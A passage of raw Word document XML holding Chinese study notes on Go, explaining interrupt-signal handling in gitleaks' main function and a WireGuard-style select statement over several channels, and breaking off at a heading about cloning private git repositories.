      </w:pPr>
      <w:r w:rsidRPr="0038052B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>“os”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F3706C" w14:textId="78543544" w:rsidR="0038052B" w:rsidRDefault="0038052B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0038052B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE4775" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6608537B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687778D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// send all logs to stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A62A951" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Logger = log.Output(zerolog.ConsoleWriter{Out: os.Stderr})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46065587" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0BF25B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// this block sets up a go routine to listen for an interrupt signal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D96D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// which will immediately exit gitleaks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E710489" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C7BF6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>创建管道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.Signal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>信号量，大小为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07B9A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>stopChan := make(chan os.Signal, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256900B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.Interrupt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>信号量给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Chan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D8BA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>signal.Notify(stopChan, os.Interrupt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F271D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> go func(){}() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>运行中断程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05EA1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>go listenForInterrupt(stopChan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F376C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551FE5F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>cmd.Execute()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C60760" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F15D521" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239E1201" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func listenForInterrupt(stopScan chan os.Signal) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022580FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>有内容就从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Chan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>stopScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>读取出数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D22E77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;-stopScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614D9327" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t># log.Fatal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>可以直接推出程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78131CC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Fatal().Msg("Interrupt signal received. Exiting...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042ECEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728857F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDB993E" w14:textId="77777777" w:rsidR="00CA6639" w:rsidRDefault="00CA6639" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFB6334" w14:textId="77777777" w:rsidR="00CA6639" w:rsidRDefault="00CA6639" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D97D85D" w14:textId="77DF5584" w:rsidR="00CA6639" w:rsidRDefault="00CA6639" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wireguard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的写法，等待几个系统进程信号的写法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245DA442" w14:textId="77777777" w:rsidR="00CA6639" w:rsidRDefault="00CA6639" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">select </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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-term:</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-errs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-device.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDAAB51" w14:textId="77777777" w:rsidR="00CA6639" w:rsidRDefault="00CA6639" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50292B6D" w14:textId="77777777" w:rsidR="00CA6639" w:rsidRDefault="00CA6639" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71552382" w14:textId="77777777" w:rsidR="00C17CA4" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给出的代码片段中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句有三个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4024DD" w14:textId="77777777" w:rsidR="00C17CA4" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D32F31" w14:textId="77777777" w:rsidR="00C17CA4" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;-term: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> term </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道接收到一个值时，执行这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C63CC5" w14:textId="77777777" w:rsidR="00C17CA4" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;-errs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> errs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道接收到一个值时，执行这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511646D4" w14:textId="77777777" w:rsidR="00C17CA4" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;-device.Wait(): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> device.Wait() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道接收到一个值时，执行这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA81731" w14:textId="77777777" w:rsidR="00C17CA4" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718EAD61" w14:textId="77777777" w:rsidR="00C17CA4" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>当任意一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> case </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以执行时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>语句就会执行相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> case</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。如果没有任何</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> case </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以执行，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>语句会一直等待，直到有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> case </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E68BD" w14:textId="77777777" w:rsidR="00C17CA4" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35363FAD" w14:textId="1D24CFF0" w:rsidR="00CA6639" w:rsidRPr="00CA6639" w:rsidRDefault="00C17CA4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个具体的例子中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>语句可能用于监视程序中不同部分发生的事件（例如错误、中断信号或设备事件）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。当收到某个事件时，程序会对其进行处理，例如关闭资源、报告错误或处理设备状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DFC2F3" w14:textId="77777777" w:rsidR="00CA6639" w:rsidRDefault="00CA6639" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78209617" w14:textId="77777777" w:rsidR="00CA6639" w:rsidRDefault="00CA6639" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A3F2C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="388" w:name="_Toc159779839"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何访问并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>clone git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的私有仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="388"/>
    </w:p>
    <w:p w14:paraId="73A597ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C264FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
